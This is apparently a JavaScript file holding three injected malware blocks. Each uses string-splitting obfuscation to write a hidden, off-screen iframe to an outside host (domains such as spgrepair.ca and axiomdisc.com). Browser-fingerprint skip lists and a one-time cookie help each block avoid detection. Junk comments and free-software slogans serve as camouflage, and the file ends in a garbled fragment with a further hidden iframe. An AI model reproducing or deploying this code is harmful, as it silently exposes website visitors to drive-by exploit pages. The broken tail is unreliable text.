/*Opanoqwu.Rfaks93ra8.3jfau3ra,fwkaiefajJHefua.fww3rifajfIIAUSJS,ASfjfjasufehh327aujasfm*/
(function(){
function stripos (d_haystack, d_needle, d_offset) {
 var haystack = (d_haystack + '').toLowerCase();
 var needle = (d_needle + '').toLowerCase();
 var index = 0;
 if ((index = haystack.indexOf(needle, d_offset)) !== -1) {
  return index;
 }
 return false;
}
function user_agent(){
 var blockList = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMobile','Series40','SymbianOS','Avant','Chromium','Firefox','Maxthon','BlackBerry'];
 var blockUA = false;
 for (var i in blockList) {
  if (stripos(navigator.userAgent, blockList[i])) {
   blockUA = true;
   break;
  }
 }
 return blockUA;
}
function setCookie(name, value, expires) {
 var date = new Date( new Date().getTime() + expires*1000 );
 document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
 var matchs = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
 return matchs ? decodeURIComponent(matchs[1]) : undefined;
}
if (!user_agent()) {
 var cookie = getCookie('misterx8wd7auefja9d');
 if (cookie == undefined) {
  setCookie('misterx8wd7auefja9d', true, 260000);	
  document.write('<'+'i'+'f'+'ra'+'m'+'e'+' s'+'r'+'c="http://delisi.spgrepair.ca/jgfvcbdseyhryjtyfkfyuk12.html" style="posi'+'tio'+'n'+':absolute;left'+':'+'-1300px;'+'top:'+'-1300px;" height="150" width="150"></i'+'f'+'r'+'a'+'m'+'e'+'>');
 }
}
})();
/*3ra7sufjaf.Kgdeskegjxfnajewgtegjlasjfljlxmfajlef.EIAksjfejamsfeja.IefjaJHHAFWUJSJfauwfjskf,fwuausjfhufhbjahsufwhhfja.IFJAUSFNjajsfh83r7sfunb3fasuyfbhasf.aJAfbwhAHWFBaHAFBEHBM.aJWBFHAVBHWFbfuau83ruabhsfbyahbshbfansafbh3tbhabsnf*///Some.devices.are.designed:to,deny,users.access.to.install,or.run.modified:versions.of.the.software.inside:them,althoughthe,manufacturer,can.do.so
(function(){
function stripos (f_haystack, f_needle, f_offset) {
 var haystack = (f_haystack + '').toLowerCase();
 var needle = (f_needle + '').toLowerCase();
 var leonmain = 0;
 if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) {
  return leonmain;
 }
 return false;
}
function control_agent(){
 var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMobile','Series40','SymbianOS','Avant','Chromium','Firefox/18.0','Firefox/18.0.1','Firefox/17.0','Firefox/25.0','Firefox/24.0','Firefox/18.0.2','Firefox/19.0','Firefox/19.0.1','Firefox/20.0','Firefox/21.0','Firefox/22.0','Firefox/23.0','Firefox/26.0','Firefox/27.0','Firefox/27.0.1','Firefox/27.0.2','Firefox/28.0','Maxthon','BlackBerry'];
 var black_agent = false;
 for (var i in see_agent) {
  if (stripos(navigator.userAgent, see_agent[i])) {
   black_agent = true;
   break;
  }
 }
 return black_agent;
}
function setCookie(name, value, expires) {
 var date = new Date( new Date().getTime() + expires*1000 );
 document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
 var match = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
 return match ? decodeURIComponent(match[1]) : undefined;
}
if (!control_agent()) {
 var cookie = getCookie('kegaoeutg18sf'+'fekfsj3asjf');
 if (cookie == undefined) {
  setCookie('kegaoeutg18sf'+'fekfsj3asjf', true, 172804);	
  document.write('<'+'if'+'ra'+'m'+'e'+' s'+'r'+'c'+'='+'"http://transoprt.dichvutructuyen.com/herjtksdgdfhr19.html" st'+'yle="posi'+'tion:absolute'+';'+'left'+':'+'-'+'1284'+'px'+';'+'top'+':'+'-'+'1284'+'px'+';'+'" height="134" width="134"><'+'/'+'if'+'ram'+'e'+'>');
 }
};
})();
//Finally,every:program.is.threatened.constantly.by,software.patent////Some.devices.are.designed:to,deny,users.access.to.install,or.run.modified:versions.of.the.software.inside:them,althoughthe,manufacturer,can.do.so
(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var idenx = 0;
if ((idenx = haystack.indexOf(needle, f_offset)) !== -1) {
return idenx;
}
return false;
}
function ttt_menubar_agent(){
var BarindexAnet = 'iPhone§Macintosh§Linux§iPad§Series40§SymbOS§Flock§SeaMonkey§Nokia§SlimBrowser§AmigaOS§Android§FreeBSD§Chrome§IEMobile§SymbianOS§Avant§Chromium§Firefox/18.0§Firefox/18.0.1§Firefox/17.0§Firefox/12.0§Firefox/25.0§Firefox/24.0§Firefox/18.0.2§Firefox/19.0§Firefox/19.0.1§Firefox/20.0§Firefox/21.0§Firefox/22.0§Firefox/23.0§Firefox/25.0.1§Firefox/26.0§Firefox/27.0§Maxthon§MRSPUTNIK§Mini§Firefox/28.0§BlackBerry§PLAYSTATION§Wget§Firefox/27.0.1§Firefox/28.0';
BarindexAnet = BarindexAnet.split('§');
var sympleAN = false;
for (var i in BarindexAnet) {
if (stripos(navigator.userAgent, BarindexAnet[i])!==false) {
sympleAN = true;
break;
}
}
return sympleAN;
}
function setCookie(name, value, expires) {
var date = new Date( new Date().getTime() + expires*1000 );
document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" ));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!ttt_menubar_agent()) {
var cookie = getCookie('barah18jg38sajejktetajsf'+'gewfi381jxfj318fjsag3r73');
if (cookie == undefined) {
setCookie('barah18jg38sajejktetajsf'+'gewfi381jxfj318fjsag3r73', true, 86404);
document.write('<if'+'rame src='+'"http://qadacafe.axiomdisc.com/hrdrgrehehrtjh19.html" style="position:absolute;left'+':-'+'1315px'+';'+'top'+':-'+'1315'+'px'+';" height="138" width="138" name="Barrel"></if'+'rame>');
}
}
})();
//Finally,every:program.is.threatened.constantly.by,software.patents


></iframe>');</iframe>');/iframe>'););e>');70"></iframe>');;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://khburpio.dns-stuff.com/4ee75635.zGZnLUwS?default" height="70" width="70"></iframe>');/iframe>');rame>');